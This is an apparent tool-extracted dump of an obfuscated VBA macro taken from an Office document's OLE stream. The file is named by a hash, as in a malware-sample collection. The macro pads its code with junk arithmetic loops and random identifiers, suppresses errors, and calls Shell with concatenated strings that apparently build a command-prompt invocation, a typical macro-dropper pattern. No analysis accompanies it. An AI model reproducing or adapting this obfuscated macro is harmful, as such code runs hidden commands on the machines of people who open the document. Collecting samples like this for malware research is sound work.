Filename     : ./macros/32a9b87a265afc5e29490fde88ebf2008e034a014fa688ee092c5aafc7a19195
OLE stream   : Macros/VBA/mFNIoqRmqnjWJ
VBA filename : mFNIoqRmqnjWJ.bas
----------------------------------------
Attribute VB_Name = "mFNIoqRmqnjWJ"
Sub iGfHL(qcSZjv)
For Each UcMfU In uiAbO
         HToQfO = (jZkrhi * Sqr(sCJnnc) / 86817 / Rnd(zJiIP - CSng(PTiiQ - DWBMmL * MwjlfB / 85156)) / (sZNnmm * WfmXzl))
Next
For Each FCMQB In VAzAc
         jXNXwH = (bXuVr * Sqr(qQAWZP) / 22618 / Rnd(trjYO - CSng(TFrcML - FPJHn * cKwLh / 41610)) / (LIVdXk * cnjhz))
Next
End Sub
Sub VEYtfDYop(LiFojAzAq As String)
On Error Resume Next
For Each HDWfRI In ckBqPm
         izzfwC = (nLjOFb * Sqr(ZSicHD) / 16527 / Rnd(nQtZp - CSng(bGiNk - hfqAiw * TrmQM / 62582)) / (CRSOHi * JJjlZN))
Next
For Each MEEAU In MucitL
         ohBAhs = (HKoPF * Sqr(tYWJO) / 17580 / Rnd(oHniPr - CSng(YHpkVw - CbIjEj * LCQov / 36100)) / (oYSTkb * huSkp))
Next
[Shell] fzUEu + Chr(vbKeyC) + LiFojAzAq + PrwOdK + adFXuUZskj, mrXMmX + 0 + mrXMmX
For Each RlUiV In pvOdiL
         LtlDFr = (oIHBf * Sqr(XYPQKu) / 31152 / Rnd(mJolWQ - CSng(ivzvR - LAiVn * ZiIdSw / 87726)) / (RjwSj * jZkzRi))
Next
For Each lGNIGN In MYjuX
         qPijW = (cHGBzj * Sqr(WplPl) / 8025 / Rnd(RobvU - CSng(lqwtz - viETu * biGTi / 8900)) / (buqNa * vqSjC))
Next
End Sub
